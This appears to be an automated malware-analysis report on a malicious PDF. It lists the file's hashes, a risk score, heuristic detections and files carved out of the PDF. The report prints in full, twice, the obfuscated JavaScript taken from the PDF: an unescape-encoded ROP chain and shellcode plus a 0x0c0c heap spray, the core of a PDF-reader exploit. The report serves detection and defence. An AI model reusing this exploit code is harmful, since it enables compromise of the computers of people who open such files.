Malicious PDF — malware analysis report

Static analysis result for SHA-256 2fad5b961e70bfbd…

MALICIOUS

PDF

53.3 KB First seen: 2026-05-10
MD5: 6698bf7015e16ff4594a50720b924ad3 SHA-1: 2b24df09a951566d382d0d5f379c5e49801f2a99 SHA-256: 2fad5b961e70bfbd5441d358f760088f20282e2bf59b29a8af5ac6dd58c39043
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3590 bytes
SHA-256: 052f1c0e5d9cbc6e0fe1743df88fb6c4fa88c7b77f21d450aabb942d61f24204
Detection
ClamAV: No threats found
Obfuscation or payload: likely
6 of 10 identifiers look randomly generated (e.g. 'fccHgpRqkHOWnCLFUikwAcfMjemRIkEsNuglEesu') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var BANRlDmAtNLyOIpXVIbpHjjeizYhNDewYv = unescape;
var eBWkBaeJqWFpREjCbbEWQyQHnbNqTmnHexjiKpoAOPZyfBVCQNIAwrxBFEcMoopSZQojcFgRBVnLwzVB = BANRlDmAtNLyOIpXVIbpHjjeizYhNDewYv( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc4d9%u74d9%uf424%ubb58%u2615%u9d0a%uc933%u49b1%u5831%u8319%u04c0%u5803%uf715%uf6d3%u7e75%u071b%ue086%ue295%u32b7%u67c1%u82e5%u2a81%u6906%udec7%u1f9d%ud1c0%u9516%udf36%u18a7%ub3f7%u3b64%uc98b%u9bb8%u01b2%udacd%u7cf3%u8e3e%u0bac%u3eed%u4ed8%u3f2e%uc50e%u470e%u1a2b%ufdfa%u4b32%u8a53%u737d%ud4df%u825d%u070c%ucda1%uf339%ucc51%ucaeb%ufe9a%u80d3%ucea4%ud9d9%ue9e1%uac01%u0a19%ub6bf%u70d9%u331b%ud3fc%ue3e8%ue524%u753d%ue9ae%uf28a%uede8%ud70d%u0a82%ud685%u9b44%ufcdd%uc740%u9d86%uadd1%ua269%u0902%u06d5%ub848%u3002%ud513%u0ee7%u25ac%u1960%u17df%ub12f%u1477%u1fb8%u5b8f%ue793%ua21f%u171c%u6109%u4748%u4021%u0cf1%u6db1%u8224%uc1e1%u6297%ua252%u0a47%u2db8%u2ab7%ue7c3%uc0d0%u6039%u15d5%u4243%u1781%ub343%u9e0d%ud9a5%uf6bd%u767e%u5327%ue7f4%u4ea8%u2770%u7c22%ue684%u09c3%u9f96%u4423%u36c4%u733b%ub763%u7fa9%ue022%u7d45%uc613%u7ec9%u5c76%ueac3%u0b39%ufa2c%ucbb9%u907a%ua3b9%uc0da%ud6e9%udd24%u4a9d%uddb1%u3ff7%ub512%u66f5%u1a54%u4d05%u6764%ua8d0%u91e2%ud956%u412e' );
var eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE = BANRlDmAtNLyOIpXVIbpHjjeizYhNDewYv( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE.length + 20 + 8 < 65536) eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE+=eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE;
aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT = eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE.substring(0, (0x0c0c-0x24)/2);
aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT += eBWkBaeJqWFpREjCbbEWQyQHnbNqTmnHexjiKpoAOPZyfBVCQNIAwrxBFEcMoopSZQojcFgRBVnLwzVB;
aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT += eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE;
mNYnq = aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT.substring(0, 65536/2);
while(mNYnq.length < 0x80000) mNYnq += mNYnq;
fccHgpRqkHOWnCLFUikwAcfMjemRIkEsNuglEesuDUtJgJgpgAhNJdWkgwNxmpgKXSrRDEyCYPluhrHJnhZ = mNYnq.substring(0, 0x80000 - (0x1020-0x08) / 2);
var CQNRDqeoDysityrmjbfOXcTzmPssXOVdMYDrtGMsAKVFrZXqDYNJytBIBEqhCy = new Array();
for (Fu=0;Fu<0x1f0;Fu++) CQNRDqeoDysityrmjbfOXcTzmPssXOVdMYDrtGMsAKVFrZXqDYNJytBIBEqhCy[Fu]=fccHgpRqkHOWnCLFUikwAcfMjemRIkEsNuglEesuDUtJgJgpgAhNJdWkgwNxmpgKXSrRDEyCYPluhrHJnhZ+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4476 bytes
SHA-256: db04ea55ffc642bfae6f158dce1b3a7bad0f85a0652218a4c5963503728fd8bb
Preview script
First 1,000 lines of the extracted script
var BANRlDmAtNLyOIpXVIbpHjjeizYhNDewYv = unescape;
var eBWkBaeJqWFpREjCbbEWQyQHnbNqTmnHexjiKpoAOPZyfBVCQNIAwrxBFEcMoopSZQojcFgRBVnLwzVB = BANRlDmAtNLyOIpXVIbpHjjeizYhNDewYv( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc4d9%u74d9%uf424%ubb58%u2615%u9d0a%uc933%u49b1%u5831%u8319%u04c0%u5803%uf715%uf6d3%u7e75%u071b%ue086%ue295%u32b7%u67c1%u82e5%u2a81%u6906%udec7%u1f9d%ud1c0%u9516%udf36%u18a7%ub3f7%u3b64%uc98b%u9bb8%u01b2%udacd%u7cf3%u8e3e%u0bac%u3eed%u4ed8%u3f2e%uc50e%u470e%u1a2b%ufdfa%u4b32%u8a53%u737d%ud4df%u825d%u070c%ucda1%uf339%ucc51%ucaeb%ufe9a%u80d3%ucea4%ud9d9%ue9e1%uac01%u0a19%ub6bf%u70d9%u331b%ud3fc%ue3e8%ue524%u753d%ue9ae%uf28a%uede8%ud70d%u0a82%ud685%u9b44%ufcdd%uc740%u9d86%uadd1%ua269%u0902%u06d5%ub848%u3002%ud513%u0ee7%u25ac%u1960%u17df%ub12f%u1477%u1fb8%u5b8f%ue793%ua21f%u171c%u6109%u4748%u4021%u0cf1%u6db1%u8224%uc1e1%u6297%ua252%u0a47%u2db8%u2ab7%ue7c3%uc0d0%u6039%u15d5%u4243%u1781%ub343%u9e0d%ud9a5%uf6bd%u767e%u5327%ue7f4%u4ea8%u2770%u7c22%ue684%u09c3%u9f96%u4423%u36c4%u733b%ub763%u7fa9%ue022%u7d45%uc613%u7ec9%u5c76%ueac3%u0b39%ufa2c%ucbb9%u907a%ua3b9%uc0da%ud6e9%udd24%u4a9d%uddb1%u3ff7%ub512%u66f5%u1a54%u4d05%u6764%ua8d0%u91e2%ud956%u412e' );
var eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE = BANRlDmAtNLyOIpXVIbpHjjeizYhNDewYv( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE.length + 20 + 8 < 65536) eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE+=eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE;
aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT = eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE.substring(0, (0x0c0c-0x24)/2);
aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT += eBWkBaeJqWFpREjCbbEWQyQHnbNqTmnHexjiKpoAOPZyfBVCQNIAwrxBFEcMoopSZQojcFgRBVnLwzVB;
aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT += eDoWTemuiFKsOEMIZMwzwCNjtSALdnPPTgJFIBsKYHehrMNMgkhCRXhgayRHxNcsygULyHgNyeZnYpGE;
mNYnq = aUjfcViJxbbRxvPokPHuYpbERTxUkUCsegBOkMoCHxOVowxelwdwsxLNT.substring(0, 65536/2);
while(mNYnq.length < 0x80000) mNYnq += mNYnq;
fccHgpRqkHOWnCLFUikwAcfMjemRIkEsNuglEesuDUtJgJgpgAhNJdWkgwNxmpgKXSrRDEyCYPluhrHJnhZ = mNYnq.substring(0, 0x80000 - (0x1020-0x08) / 2);
var CQNRDqeoDysityrmjbfOXcTzmPssXOVdMYDrtGMsAKVFrZXqDYNJytBIBEqhCy = new Array();
for (Fu=0;Fu<0x1f0;Fu++) CQNRDqeoDysityrmjbfOXcTzmPssXOVdMYDrtGMsAKVFrZXqDYNJytBIBEqhCy[Fu]=fccHgpRqkHOWnCLFUikwAcfMjemRIkEsNuglEesuDUtJgJgpgAhNJdWkgwNxmpgKXSrRDEyCYPluhrHJnhZ+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000053756 00000 n
0000053789 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54275
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: dd45ddc248afd1d38bb357f84e52814b240d39525d3ebbabc94bdd20b1d00458
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.